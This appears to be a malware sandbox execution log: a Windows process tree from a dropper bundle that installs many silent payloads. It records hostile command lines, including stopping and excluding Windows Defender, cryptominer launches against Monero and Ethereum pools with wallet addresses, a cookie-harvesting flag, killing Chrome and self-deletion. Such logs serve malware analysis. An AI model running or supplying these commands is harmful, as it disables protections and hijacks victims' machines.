        C:\Users\Admin\AppData\Roaming\1.exe
        
        "C:\Users\Admin\AppData\Roaming\1.exe"
        10⤵
        
        PID:3160
        
        C:\Users\Admin\AppData\Roaming\2.exe
        
        C:\Users\Admin\AppData\Roaming\2.exe
        9⤵
        
        PID:4180
        
        C:\Users\Admin\AppData\Roaming\2.exe
        
        "{path}"
        10⤵
        
        PID:3640
        
        C:\Users\Admin\AppData\Local\Temp\vxcz0berbgg\vict.exe
        
        "C:\Users\Admin\AppData\Local\Temp\vxcz0berbgg\vict.exe" /VERYSILENT /id=535
        8⤵
        Executes dropped EXE
        Suspicious use of SetWindowsHookEx
        
        PID:4416
        
        C:\Users\Admin\AppData\Local\Temp\is-1N62S.tmp\vict.tmp
        
        "C:\Users\Admin\AppData\Local\Temp\is-1N62S.tmp\vict.tmp" /SL5="$20244,870426,780800,C:\Users\Admin\AppData\Local\Temp\vxcz0berbgg\vict.exe" /VERYSILENT /id=535
        9⤵
        Executes dropped EXE
        Loads dropped DLL
        Suspicious use of SetWindowsHookEx
        
        PID:192
        
        C:\Users\Admin\AppData\Local\Temp\is-OC7TN.tmp\win1host.exe
        
        "C:\Users\Admin\AppData\Local\Temp\is-OC7TN.tmp\win1host.exe" 535
        10⤵
        
        PID:5212
        
        C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 5212 -s 1412
        11⤵
        Program crash
        
        PID:7392
        
        C:\Users\Admin\AppData\Local\Temp\qitf0jabnep\vpn.exe
        
        "C:\Users\Admin\AppData\Local\Temp\qitf0jabnep\vpn.exe" /silent /subid=482
        8⤵
        Executes dropped EXE
        Suspicious use of SetWindowsHookEx
        
        PID:4440
        
        C:\Users\Admin\AppData\Local\Temp\is-C6H65.tmp\vpn.tmp
        
        "C:\Users\Admin\AppData\Local\Temp\is-C6H65.tmp\vpn.tmp" /SL5="$2029E,15170975,270336,C:\Users\Admin\AppData\Local\Temp\qitf0jabnep\vpn.exe" /silent /subid=482
        9⤵
        Executes dropped EXE
        Loads dropped DLL
        Drops file in Program Files directory
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        Suspicious use of FindShellTrayWindow
        Suspicious use of SetWindowsHookEx
        
        PID:1976
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\Program Files (x86)\MaskVPN\driver\win764\uninstall.bat" "
        10⤵
        
        PID:5100
        
        C:\Program Files (x86)\MaskVPN\driver\win764\tapinstall.exe
        
        tapinstall.exe remove tap0901
        11⤵
        
        PID:5324
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\Program Files (x86)\MaskVPN\driver\win764\install.bat" "
        10⤵
        
        PID:4052
        
        C:\Program Files (x86)\MaskVPN\driver\win764\tapinstall.exe
        
        tapinstall.exe install OemVista.inf tap0901
        11⤵
        
        PID:4236
        
        C:\Program Files (x86)\MaskVPN\mask_svc.exe
        
        "C:\Program Files (x86)\MaskVPN\mask_svc.exe" uninstall
        10⤵
        
        PID:6564
        
        C:\Program Files (x86)\MaskVPN\mask_svc.exe
        
        "C:\Program Files (x86)\MaskVPN\mask_svc.exe" install
        10⤵
        
        PID:1020
        
        C:\Users\Admin\AppData\Local\Temp\gj3kxna50xk\Setup3310.exe
        
        "C:\Users\Admin\AppData\Local\Temp\gj3kxna50xk\Setup3310.exe" /Verysilent /subid=577
        8⤵
        Executes dropped EXE
        Suspicious use of SetWindowsHookEx
        
        PID:2516
        
        C:\Users\Admin\AppData\Local\Temp\is-Q0L60.tmp\Setup3310.tmp
        
        "C:\Users\Admin\AppData\Local\Temp\is-Q0L60.tmp\Setup3310.tmp" /SL5="$3026E,138429,56832,C:\Users\Admin\AppData\Local\Temp\gj3kxna50xk\Setup3310.exe" /Verysilent /subid=577
        9⤵
        Executes dropped EXE
        Loads dropped DLL
        Suspicious use of FindShellTrayWindow
        Suspicious use of SetWindowsHookEx
        
        PID:196
        
        C:\Users\Admin\AppData\Local\Temp\is-URRVF.tmp\Setup.exe
        
        "C:\Users\Admin\AppData\Local\Temp\is-URRVF.tmp\Setup.exe" /Verysilent
        10⤵
        Executes dropped EXE
        Suspicious use of SetWindowsHookEx
        
        PID:204
        
        C:\Program Files (x86)\67e16a30-3df6-4d4c-a838-a81a8806dda3\Versium Research\hjjgaa.exe
        
        "C:\Program Files (x86)\67e16a30-3df6-4d4c-a838-a81a8806dda3\Versium Research\hjjgaa.exe"
        11⤵
        
        PID:752
        
        C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
        
        C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
        12⤵
        
        PID:4696
        
        C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
        
        C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
        12⤵
        
        PID:5676
        
        C:\Program Files (x86)\67e16a30-3df6-4d4c-a838-a81a8806dda3\Versium Research\jg7_7wjg.exe
        
        "C:\Program Files (x86)\67e16a30-3df6-4d4c-a838-a81a8806dda3\Versium Research\jg7_7wjg.exe"
        11⤵
        
        PID:4692
        
        C:\Program Files (x86)\67e16a30-3df6-4d4c-a838-a81a8806dda3\Versium Research\RunWW.exe
        
        "C:\Program Files (x86)\67e16a30-3df6-4d4c-a838-a81a8806dda3\Versium Research\RunWW.exe"
        11⤵
        
        PID:4464
        
        C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 4464 -s 948
        12⤵
        Program crash
        
        PID:6432
        
        C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 4464 -s 1008
        12⤵
        Program crash
        
        PID:2592
        
        C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 4464 -s 1012
        12⤵
        Program crash
        
        PID:6672
        
        C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 4464 -s 1148
        12⤵
        Program crash
        
        PID:576
        
        C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 4464 -s 1188
        12⤵
        Program crash
        
        PID:6412
        
        C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 4464 -s 1252
        12⤵
        Program crash
        
        PID:4752
        
        C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 4464 -s 1572
        12⤵
        Program crash
        
        PID:5940
        
        C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 4464 -s 1616
        12⤵
        Program crash
        
        PID:5140
        
        C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 4464 -s 1776
        12⤵
        Program crash
        
        PID:5764
        
        C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 4464 -s 1532
        12⤵
        Program crash
        
        PID:4820
        
        C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 4464 -s 1856
        12⤵
        Program crash
        
        PID:6456
        
        C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 4464 -s 1748
        12⤵
        Program crash
        
        PID:716
        
        C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 4464 -s 1808
        12⤵
        Program crash
        
        PID:6376
        
        C:\Program Files (x86)\67e16a30-3df6-4d4c-a838-a81a8806dda3\Versium Research\LabPicV3.exe
        
        "C:\Program Files (x86)\67e16a30-3df6-4d4c-a838-a81a8806dda3\Versium Research\LabPicV3.exe"
        11⤵
        
        PID:4212
        
        C:\Users\Admin\AppData\Local\Temp\is-SQI11.tmp\LabPicV3.tmp
        
        "C:\Users\Admin\AppData\Local\Temp\is-SQI11.tmp\LabPicV3.tmp" /SL5="$10444,239334,155648,C:\Program Files (x86)\67e16a30-3df6-4d4c-a838-a81a8806dda3\Versium Research\LabPicV3.exe"
        12⤵
        
        PID:312
        
        C:\Users\Admin\AppData\Local\Temp\is-BN3D1.tmp\ppppppfy.exe
        
        "C:\Users\Admin\AppData\Local\Temp\is-BN3D1.tmp\ppppppfy.exe" /S /UID=lab214
        13⤵
        
        PID:6052
        
        C:\Program Files\Windows Photo Viewer\HZCYGFFZEM\prolab.exe
        
        "C:\Program Files\Windows Photo Viewer\HZCYGFFZEM\prolab.exe" /VERYSILENT
        14⤵
        
        PID:5860
        
        C:\Users\Admin\AppData\Local\Temp\is-FBC2U.tmp\prolab.tmp
        
        "C:\Users\Admin\AppData\Local\Temp\is-FBC2U.tmp\prolab.tmp" /SL5="$A0060,575243,216576,C:\Program Files\Windows Photo Viewer\HZCYGFFZEM\prolab.exe" /VERYSILENT
        15⤵
        
        PID:3708
        
        C:\Users\Admin\AppData\Local\Temp\d8-3c74b-f8b-adb8f-f1ba98d4633e4\Vexumeshude.exe
        
        "C:\Users\Admin\AppData\Local\Temp\d8-3c74b-f8b-adb8f-f1ba98d4633e4\Vexumeshude.exe"
        14⤵
        
        PID:5536
        
        C:\Windows\Microsoft.NET\Framework64\v2.0.50727\dw20.exe
        
        dw20.exe -x -s 1936
        15⤵
        
        PID:6092
        
        C:\Users\Admin\AppData\Local\Temp\b7-bc6c7-42a-32094-d1257849cdff7\Tefyropiqi.exe
        
        "C:\Users\Admin\AppData\Local\Temp\b7-bc6c7-42a-32094-d1257849cdff7\Tefyropiqi.exe"
        14⤵
        
        PID:4988
        
        C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\pvti1dcb.i5b\md6_6ydj.exe & exit
        15⤵
        
        PID:6660
        
        C:\Users\Admin\AppData\Local\Temp\pvti1dcb.i5b\md6_6ydj.exe
        
        C:\Users\Admin\AppData\Local\Temp\pvti1dcb.i5b\md6_6ydj.exe
        16⤵
        
        PID:364
        
        C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\wfss4sug.ywj\askinstall31.exe & exit
        15⤵
        
        PID:6328
        
        C:\Users\Admin\AppData\Local\Temp\wfss4sug.ywj\askinstall31.exe
        
        C:\Users\Admin\AppData\Local\Temp\wfss4sug.ywj\askinstall31.exe
        16⤵
        
        PID:6688
        
        C:\Windows\SysWOW64\cmd.exe
        
        cmd.exe /c taskkill /f /im chrome.exe
        17⤵
        
        PID:4824
        
        C:\Windows\SysWOW64\taskkill.exe
        
        taskkill /f /im chrome.exe
        18⤵
        Kills process with taskkill
        
        PID:96
        
        C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\eedfv45t.lud\toolspab1.exe & exit
        15⤵
        
        PID:6364
        
        C:\Users\Admin\AppData\Local\Temp\eedfv45t.lud\toolspab1.exe
        
        C:\Users\Admin\AppData\Local\Temp\eedfv45t.lud\toolspab1.exe
        16⤵
        
        PID:888
        
        C:\Users\Admin\AppData\Local\Temp\eedfv45t.lud\toolspab1.exe
        
        C:\Users\Admin\AppData\Local\Temp\eedfv45t.lud\toolspab1.exe
        17⤵
        
        PID:6816
        
        C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\v0i3xj3f.jde\GcleanerWW.exe /mixone & exit
        15⤵
        
        PID:6856
        
        C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\erlfyffe.0gf\setup_10.2_mix.exe & exit
        15⤵
        
        PID:6080
        
        C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\3w5xagiq.bxt\file.exe & exit
        15⤵
        
        PID:6728
        
        C:\Users\Admin\AppData\Local\Temp\3w5xagiq.bxt\file.exe
        
        C:\Users\Admin\AppData\Local\Temp\3w5xagiq.bxt\file.exe
        16⤵
        
        PID:7644
        
        C:\Users\Admin\AppData\Local\Temp\RarSFX3\Setup.exe
        
        "C:\Users\Admin\AppData\Local\Temp\RarSFX3\Setup.exe"
        17⤵
        
        PID:7416
        
        C:\Users\Admin\AppData\Local\Temp\KYKSOZ2254\multitimer.exe
        
        "C:\Users\Admin\AppData\Local\Temp\KYKSOZ2254\multitimer.exe" 0 3060197d33d91c80.94013368 0 101
        18⤵
        
        PID:1524
        
        C:\Users\Admin\AppData\Local\Temp\KYKSOZ2254\multitimer.exe
        
        "C:\Users\Admin\AppData\Local\Temp\KYKSOZ2254\multitimer.exe" 1 3.1617536819.6069a7333e371 101
        19⤵
        
        PID:2008
        
        C:\Users\Admin\AppData\Local\Temp\KYKSOZ2254\multitimer.exe
        
        "C:\Users\Admin\AppData\Local\Temp\KYKSOZ2254\multitimer.exe" 2 3.1617536819.6069a7333e371
        20⤵
        
        PID:5240
        
        C:\Users\Admin\AppData\Local\Temp\mcf15y0xnpj\jfqmle5ohvi.exe
        
        "C:\Users\Admin\AppData\Local\Temp\mcf15y0xnpj\jfqmle5ohvi.exe" /ustwo INSTALL
        21⤵
        
        PID:7612
        
        C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c taskkill /im "jfqmle5ohvi.exe" /f & erase "C:\Users\Admin\AppData\Local\Temp\mcf15y0xnpj\jfqmle5ohvi.exe" & exit
        22⤵
        
        PID:5344
        
        C:\Windows\SysWOW64\taskkill.exe
        
        taskkill /im "jfqmle5ohvi.exe" /f
        23⤵
        Kills process with taskkill
        
        PID:7572
        
        C:\Users\Admin\AppData\Local\Temp\tfre1gdhevx\cpyrix.exe
        
        "C:\Users\Admin\AppData\Local\Temp\tfre1gdhevx\cpyrix.exe" /VERYSILENT
        21⤵
        
        PID:7440
        
        C:\Users\Admin\AppData\Roaming\1.exe
        
        C:\Users\Admin\AppData\Roaming\1.exe
        22⤵
        
        PID:3972
        
        C:\Users\Admin\AppData\Local\Temp\115214d1-403c-4bff-bc7c-e4fd786a50b1\AdvancedRun.exe
        
        "C:\Users\Admin\AppData\Local\Temp\115214d1-403c-4bff-bc7c-e4fd786a50b1\AdvancedRun.exe" /EXEFilename "C:\Users\Admin\AppData\Local\Temp\115214d1-403c-4bff-bc7c-e4fd786a50b1\test.bat" /WindowState ""0"" /PriorityClass ""32"" /CommandLine "" /StartDirectory "" /RunAs 8 /Run
        23⤵
        
        PID:4596
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\115214d1-403c-4bff-bc7c-e4fd786a50b1\test.bat"
        24⤵
        
        PID:4076
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Roaming\1.exe" -Force
        23⤵
        
        PID:5416
        
        C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c timeout 1
        23⤵
        
        PID:6544
        
        C:\Windows\SysWOW64\timeout.exe
        
        timeout 1
        24⤵
        Delays execution with timeout.exe
        
        PID:5560
        
        C:\Users\Admin\AppData\Roaming\1.exe
        
        "C:\Users\Admin\AppData\Roaming\1.exe"
        23⤵
        
        PID:2212
        
        C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 3972 -s 1612
        23⤵
        Program crash
        
        PID:6180
        
        C:\Users\Admin\AppData\Roaming\2.exe
        
        C:\Users\Admin\AppData\Roaming\2.exe
        22⤵
        
        PID:4816
        
        C:\Users\Admin\AppData\Roaming\2.exe
        
        "{path}"
        23⤵
        
        PID:4548
        
        C:\Users\Admin\AppData\Roaming\2.exe
        
        "{path}"
        23⤵
        
        PID:7744
        
        C:\Users\Admin\AppData\Roaming\2.exe
        
        "{path}"
        23⤵
        
        PID:7788
        
        C:\Users\Admin\AppData\Local\Temp\kh5fpnyz3pm\Setup3310.exe
        
        "C:\Users\Admin\AppData\Local\Temp\kh5fpnyz3pm\Setup3310.exe" /Verysilent /subid=577
        21⤵
        
        PID:3308
        
        C:\Users\Admin\AppData\Local\Temp\is-UO533.tmp\Setup3310.tmp
        
        "C:\Users\Admin\AppData\Local\Temp\is-UO533.tmp\Setup3310.tmp" /SL5="$402A2,138429,56832,C:\Users\Admin\AppData\Local\Temp\kh5fpnyz3pm\Setup3310.exe" /Verysilent /subid=577
        22⤵
        
        PID:6480
        
        C:\Users\Admin\AppData\Local\Temp\is-7TUDP.tmp\Setup.exe
        
        "C:\Users\Admin\AppData\Local\Temp\is-7TUDP.tmp\Setup.exe" /Verysilent
        23⤵
        
        PID:1116
        
        C:\Users\Admin\AppData\Local\Temp\wp1hm5fqc33\app.exe
        
        "C:\Users\Admin\AppData\Local\Temp\wp1hm5fqc33\app.exe" /8-23
        21⤵
        
        PID:7716
        
        C:\Users\Admin\AppData\Local\Temp\NHLOG2DNM0\setups.exe
        
        "C:\Users\Admin\AppData\Local\Temp\NHLOG2DNM0\setups.exe" ll
        18⤵
        
        PID:7632
        
        C:\Users\Admin\AppData\Local\Temp\is-IF96E.tmp\setups.tmp
        
        "C:\Users\Admin\AppData\Local\Temp\is-IF96E.tmp\setups.tmp" /SL5="$2061E,454998,229376,C:\Users\Admin\AppData\Local\Temp\NHLOG2DNM0\setups.exe" ll
        19⤵
        
        PID:7992
        
        C:\Users\Admin\AppData\Local\Temp\RarSFX3\askinstall20.exe
        
        "C:\Users\Admin\AppData\Local\Temp\RarSFX3\askinstall20.exe"
        17⤵
        
        PID:7952
        
        C:\Windows\SysWOW64\cmd.exe
        
        cmd.exe /c taskkill /f /im chrome.exe
        18⤵
        
        PID:7692
        
        C:\Windows\SysWOW64\taskkill.exe
        
        taskkill /f /im chrome.exe
        19⤵
        Kills process with taskkill
        
        PID:4912
        
        C:\Users\Admin\AppData\Local\Temp\RarSFX3\Full Program Features.exe
        
        "C:\Users\Admin\AppData\Local\Temp\RarSFX3\Full Program Features.exe"
        17⤵
        
        PID:2204
        
        C:\Windows\SysWOW64\WScript.exe
        
        "C:\Windows\System32\WScript.exe" "C:\Program Files\unins.vbs"
        18⤵
        
        PID:7584
        
        C:\Windows\SysWOW64\rundll32.exe
        
        "C:\Windows\System32\rundll32.exe" "C:\Program Files\unins0000.dll",install
        19⤵
        
        PID:6556
        
        C:\Users\Admin\AppData\Local\Temp\RarSFX3\file.exe
        
        "C:\Users\Admin\AppData\Local\Temp\RarSFX3\file.exe"
        17⤵
        
        PID:7556
        
        C:\Users\Admin\AppData\Roaming\9E02.tmp.exe
        
        "C:\Users\Admin\AppData\Roaming\9E02.tmp.exe"
        18⤵
        
        PID:5868
        
        C:\Windows\system32\msiexec.exe
        
        -P stratum1+ssl://0xb7633a80145Ec9ce2b8b5F80AB36C783064C2E10.work@eu-eth.hiveon.net:24443 -R --response-timeout 30 --farm-retries 99999
        19⤵
        
        PID:3276
        
        C:\Windows\system32\msiexec.exe
        
        -o pool.supportxmr.com:8080 -u 47wDrszce6VbnMB4zhhEA1Gr3EzwHx2eS6QzC5sFoq8iGdMjnzX8bnEjBdQHsAuW8C1SNgxyGa4DQTVnQ9jfhRod73np5P8 --cpu-max-threads-hint 50 -r 9999
        19⤵
        
        PID:5624
        
        C:\Users\Admin\AppData\Roaming\A8D1.tmp.exe
        
        "C:\Users\Admin\AppData\Roaming\A8D1.tmp.exe"
        18⤵
        
        PID:2512
        
        C:\Windows\SysWOW64\cmd.exe
        
        /c timeout /t 3 & del /f /q C:\Users\Admin\AppData\Roaming\A8D1.tmp.exe
        19⤵
        
        PID:7540
        
        C:\Windows\SysWOW64\timeout.exe
        
        timeout /t 3
        20⤵
        Delays execution with timeout.exe
        
        PID:4900
        
        C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\system32\cmd.exe" /c ping 127.0.0.1 && del "C:\Users\Admin\AppData\Local\Temp\RarSFX3\file.exe"
        18⤵
        
        PID:7748
        
        C:\Windows\SysWOW64\PING.EXE
        
        ping 127.0.0.1
        19⤵
        Runs ping.exe
        
        PID:5712
        
        C:\Users\Admin\AppData\Local\Temp\RarSFX3\md2_2efs.exe
        
        "C:\Users\Admin\AppData\Local\Temp\RarSFX3\md2_2efs.exe"
        17⤵
        
        PID:7588
        
        C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\1f4h5wiq.3le\app.exe /8-2222 & exit
        15⤵
        
        PID:8140
        
        C:\Users\Admin\AppData\Local\Temp\1f4h5wiq.3le\app.exe
        
        C:\Users\Admin\AppData\Local\Temp\1f4h5wiq.3le\app.exe /8-2222
        16⤵
        
        PID:7884
        
        C:\Users\Admin\AppData\Local\Temp\1f4h5wiq.3le\app.exe
        
        "C:\Users\Admin\AppData\Local\Temp\1f4h5wiq.3le\app.exe" /8-2222
        17⤵
        
        PID:2888
        
        C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\qzsvluh5.p2w\Four.exe & exit
        15⤵
        
        PID:6252
        
        C:\Users\Admin\AppData\Local\Temp\qzsvluh5.p2w\Four.exe
        
        C:\Users\Admin\AppData\Local\Temp\qzsvluh5.p2w\Four.exe
        16⤵
        
        PID:5884
        
        C:\Users\Admin\AppData\Local\Temp\RLNJT3T5S0\multitimer.exe
        
        "C:\Users\Admin\AppData\Local\Temp\RLNJT3T5S0\multitimer.exe" 0 306033e7ac94ccd3.87625057 0 104
        17⤵
        
        PID:6296
        
        C:\Users\Admin\AppData\Local\Temp\RLNJT3T5S0\multitimer.exe
        
        "C:\Users\Admin\AppData\Local\Temp\RLNJT3T5S0\multitimer.exe" 1 3.1617536899.6069a783bc7e4 104
        18⤵
        
        PID:3484
        
        C:\Users\Admin\AppData\Local\Temp\RLNJT3T5S0\multitimer.exe
        
        "C:\Users\Admin\AppData\Local\Temp\RLNJT3T5S0\multitimer.exe" 2 3.1617536899.6069a783bc7e4
        19⤵
        
        PID:7244
        
        C:\Users\Admin\AppData\Local\Temp\z4fbyhzxvdu\vict.exe
        
        "C:\Users\Admin\AppData\Local\Temp\z4fbyhzxvdu\vict.exe" /VERYSILENT /id=535
        20⤵
        
        PID:4616
        
        C:\Users\Admin\AppData\Local\Temp\is-DTCHE.tmp\vict.tmp
        
        "C:\Users\Admin\AppData\Local\Temp\is-DTCHE.tmp\vict.tmp" /SL5="$4059C,870426,780800,C:\Users\Admin\AppData\Local\Temp\z4fbyhzxvdu\vict.exe" /VERYSILENT /id=535
        21⤵
        
        PID:5040
        
        C:\Users\Admin\AppData\Local\Temp\is-8GR5N.tmp\win1host.exe
        
        "C:\Users\Admin\AppData\Local\Temp\is-8GR5N.tmp\win1host.exe" 535
        22⤵
        
        PID:6268
        
        C:\Users\Admin\AppData\Local\Temp\1ctzegxxcbc\cpyrix.exe
        
        "C:\Users\Admin\AppData\Local\Temp\1ctzegxxcbc\cpyrix.exe" /VERYSILENT
        20⤵
        
        PID:7616
        
        C:\Users\Admin\AppData\Roaming\1.exe
        
        C:\Users\Admin\AppData\Roaming\1.exe
        21⤵
        
        PID:6228
        
        C:\Users\Admin\AppData\Local\Temp\91a69a79-fb43-4854-b313-655d7f3a8d4a\AdvancedRun.exe
        
        "C:\Users\Admin\AppData\Local\Temp\91a69a79-fb43-4854-b313-655d7f3a8d4a\AdvancedRun.exe" /EXEFilename "C:\Users\Admin\AppData\Local\Temp\91a69a79-fb43-4854-b313-655d7f3a8d4a\test.bat" /WindowState ""0"" /PriorityClass ""32"" /CommandLine "" /StartDirectory "" /RunAs 8 /Run
        22⤵
        
        PID:580
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\91a69a79-fb43-4854-b313-655d7f3a8d4a\test.bat"
        23⤵
        
        PID:5060
        
        C:\Windows\system32\sc.exe
        
        sc stop windefend
        24⤵
        
        PID:7860
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Roaming\1.exe" -Force
        22⤵
        
        PID:928
        
        C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c timeout 1
        22⤵
        
        PID:7564
        
        C:\Windows\SysWOW64\timeout.exe
        
        timeout 1
        23⤵
        Delays execution with timeout.exe
        
        PID:6508
        
        C:\Users\Admin\AppData\Roaming\1.exe
        
        "C:\Users\Admin\AppData\Roaming\1.exe"
        22⤵
        
        PID:6664
        
        C:\Users\Admin\AppData\Roaming\1.exe
        
        "C:\Users\Admin\AppData\Roaming\1.exe"
        22⤵
        
        PID:7028
        
        C:\Users\Admin\AppData\Roaming\1.exe
        
        "C:\Users\Admin\AppData\Roaming\1.exe"
        22⤵
        
        PID:6260
        
        C:\Users\Admin\AppData\Roaming\2.exe
        
        C:\Users\Admin\AppData\Roaming\2.exe
        21⤵
        
        PID:4512
        
        C:\Users\Admin\AppData\Roaming\2.exe
        
        "{path}"
        22⤵
        
        PID:8652
        
        C:\Users\Admin\AppData\Local\Temp\vaafx2hfwft\wmnpzroojto.exe
        
        "C:\Users\Admin\AppData\Local\Temp\vaafx2hfwft\wmnpzroojto.exe" /ustwo INSTALL
        20⤵
        
        PID:6052
        
        C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c taskkill /im "wmnpzroojto.exe" /f & erase "C:\Users\Admin\AppData\Local\Temp\vaafx2hfwft\wmnpzroojto.exe" & exit
        21⤵
        
        PID:7940
        
        C:\Windows\SysWOW64\taskkill.exe
        
        taskkill /im "wmnpzroojto.exe" /f
        22⤵
        Kills process with taskkill
        
        PID:6340
        
        C:\Users\Admin\AppData\Local\Temp\233o2lagbse\app.exe
        
        "C:\Users\Admin\AppData\Local\Temp\233o2lagbse\app.exe" /8-23
        20⤵
        
        PID:6612
        
        C:\Users\Admin\AppData\Local\Temp\ozq3gcwn2za\Setup3310.exe
        
        "C:\Users\Admin\AppData\Local\Temp\ozq3gcwn2za\Setup3310.exe" /Verysilent /subid=577
        20⤵
        
        PID:216
        
        C:\Users\Admin\AppData\Local\Temp\is-E806J.tmp\Setup3310.tmp
        
        "C:\Users\Admin\AppData\Local\Temp\is-E806J.tmp\Setup3310.tmp" /SL5="$A02B0,138429,56832,C:\Users\Admin\AppData\Local\Temp\ozq3gcwn2za\Setup3310.exe" /Verysilent /subid=577
        21⤵
        
        PID:7904
        
        C:\Users\Admin\AppData\Local\Temp\is-DUM6M.tmp\Setup.exe
        
        "C:\Users\Admin\AppData\Local\Temp\is-DUM6M.tmp\Setup.exe" /Verysilent
        22⤵
        
        PID:8004
        
        C:\Users\Admin\AppData\Local\Temp\DMIJ1CLYKZ\setups.exe
        
        "C:\Users\Admin\AppData\Local\Temp\DMIJ1CLYKZ\setups.exe" ll
        17⤵
        
        PID:8072
        
        C:\Users\Admin\AppData\Local\Temp\is-FVVK8.tmp\setups.tmp
        
        "C:\Users\Admin\AppData\Local\Temp\is-FVVK8.tmp\setups.tmp" /SL5="$4048C,454998,229376,C:\Users\Admin\AppData\Local\Temp\DMIJ1CLYKZ\setups.exe" ll
        18⤵
        
        PID:5556
        
        C:\Program Files (x86)\67e16a30-3df6-4d4c-a838-a81a8806dda3\Versium Research\lylal220.exe
        
        "C:\Program Files (x86)\67e16a30-3df6-4d4c-a838-a81a8806dda3\Versium Research\lylal220.exe"
        11⤵
        
        PID:668
        
        C:\Users\Admin\AppData\Local\Temp\is-2GGIG.tmp\lylal220.tmp
        
        "C:\Users\Admin\AppData\Local\Temp\is-2GGIG.tmp\lylal220.tmp" /SL5="$10446,491750,408064,C:\Program Files (x86)\67e16a30-3df6-4d4c-a838-a81a8806dda3\Versium Research\lylal220.exe"
        12⤵
        
        PID:2088
        
        C:\Users\Admin\AppData\Local\Temp\is-L707F.tmp\Microsoft.exe
        
        "C:\Users\Admin\AppData\Local\Temp\is-L707F.tmp\Microsoft.exe" /S /UID=lylal220
        13⤵
        
        PID:6068
        
        C:\Program Files\Java\ZDIUQTXYAK\irecord.exe
        
        "C:\Program Files\Java\ZDIUQTXYAK\irecord.exe" /VERYSILENT
        14⤵
        
        PID:4704
        
        C:\Users\Admin\AppData\Local\Temp\is-ROUE7.tmp\irecord.tmp
        
        "C:\Users\Admin\AppData\Local\Temp\is-ROUE7.tmp\irecord.tmp" /SL5="$1047C,6265333,408064,C:\Program Files\Java\ZDIUQTXYAK\irecord.exe" /VERYSILENT
        15⤵
        
        PID:3292
        
        C:\Users\Admin\AppData\Local\Temp\cd-dcb56-fc3-90383-cbf8cebd66c51\Maeshugysycu.exe
        
        "C:\Users\Admin\AppData\Local\Temp\cd-dcb56-fc3-90383-cbf8cebd66c51\Maeshugysycu.exe"
        14⤵
        
        PID:5164
        
        C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\0yix3yyi.1vm\md6_6ydj.exe & exit
        15⤵
        
        PID:6736
        
        C:\Users\Admin\AppData\Local\Temp\0yix3yyi.1vm\md6_6ydj.exe
        
        C:\Users\Admin\AppData\Local\Temp\0yix3yyi.1vm\md6_6ydj.exe
        16⤵
        
        PID:6256
        
